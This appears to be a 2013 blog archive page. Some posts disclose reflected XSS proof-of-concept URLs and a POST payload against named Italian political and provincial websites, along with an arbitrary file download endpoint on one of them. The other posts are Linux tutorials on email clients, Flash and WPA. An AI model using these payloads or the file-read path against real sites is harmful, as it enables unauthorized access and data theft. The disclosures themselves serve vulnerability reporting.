Skip to main content

Posts

Showing posts from August, 2013

pdl.it | XSS

XSS
sample
 http://servizi.pdl.it/cartoline/ancora-in-campo-per-l-italia/cartolina.php?img=ancora-in-campo-per-l-italia.jpg&ico=ancora-in-campo-per-l-italia-ico.jpg&lnk=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E%3C%22bene.php&cartolina=1

also other arguments can be used for the XSS


XSS on another site with wordpress
http://www.gruppopdl-berlusconipresidente.it/wp-admin/admin-ajax.php?action=spiderbigcalendar&theme_id=3&calendar=1&date=2015-08&many_sp_calendar=1&cur_page_url=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E

Access emails from Outlook Web Access with any client email (ex. thunerbird, outlook express, outlook, evolution, pegasus, eudora, foxmail)

Access emails from Outlook Web Access with any client email (ex. thunerbird, outlook express, outlook, evolution, pegasus, eudora, foxmail)

If you are in hurry to download/access all your emails stored (only) on "Outlook Web Access" you can try those softwares:

- DavMail - http://sourceforge.net/projects/davmail/ - for windows 7, windows 8, windows vista, windows xp, linux, MacOsX
- freepops + owa.lua - for windows 7, windows 8, windows vista, windows xp, linux, MacOs X, BeOS .
- Thunderbird + ExQuilla - for windows 7, windows 8, windows vista, windows xp, linux, MacOs X


The most generic and rapid is DavMail























































ecadb.provincia.fe.it | remote files download, XSS, System compromise

http://ecadb.provincia.fe.it/samiraeca/fe/getimage.do?file={your file}

(requests shouldn't be done via browser but with a simple client)

_________________________________________

XSS
http://ecadb.provincia.fe.it/samiraeca/fe/ricercalibera.do
Just use a

a simple search with a term that can be found (ex. "este") and the option to find any submitted word
este <script>alert(1);</script>


Sample POST DATA
value%28VALUE%29=este+%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&value%28TYPE%29=7&value%28OPTION%29=1&value%28TSK%29=scheda_eca&fromform=1


_________________________________________

Etc

install flash player on lubuntu ubuntu debian older versions | browser chromium, firefox

download: install_flash_player_11_linux.i386.tar.gz

from the official adobe website

uncompress the tar.gz file
tar xvf install_flash_player_11_linux.i386.tar.gz


chromium (in my case Version 25.0.1364.160 Ubuntu 11.10 (25.0.1364.160-0ubuntu0.11.10.1) )

$ sudo cp libflashplayer.so /usr/lib/chromium-browser/plugins/

Mozilla (make sure that you have installed it and the folder exists)
$ sudo cp libflashplayer.so ~/.mozilla/plugin/

and copy all the other files
$ cp -R ./usr/* /usr/



This should work to use flash player on Mozilla firefox and Chromium. It applies even if (the older) pepper flash doesn't work. A workaround can be done with the same procedure and the latest versions of adobe flash.
Supported OS: Linux Lubuntu Flash Player Linux Debian Linux Ubuntu Linux Red Hat

easy WPA on linux lubuntu/ubuntu/debian with GUI User Interface - easy way to use wpa without bad password problem

easy WPA on linux lubuntu/ubuntu/debian with GUI User Interface - easy way to use wpa without bad password problem

For example on Lubuntu we have the network manager that is not acting like expected and the same goes for wpa supplicant (see below)

wpa supplicant installation (NOT SUGGESTED)
wpa supplicant can be installed with those simple commands

$ sudo apt-get install wpasupplicant
and (if you want the gui)
$ sudo apt-get install wpagui

with the main problem is that wpagui doesn't recognize several wifi cards even if available from iwconfig (just read other tutorials if you don't even have the wifi network card shown via iwconfig).

As example this card doesn't show up with wpagui (on lubuntu 11):

description: Wireless interface
product: PRO/Wireless 2200BG [Calexico2] Network Connection
vendor: Intel Corporation
________________________


Fast Solution: 
Just install Wicd by using:
$ sudo apt-get install wicd


If you are still unable to use the wifi (with wpa) connection by …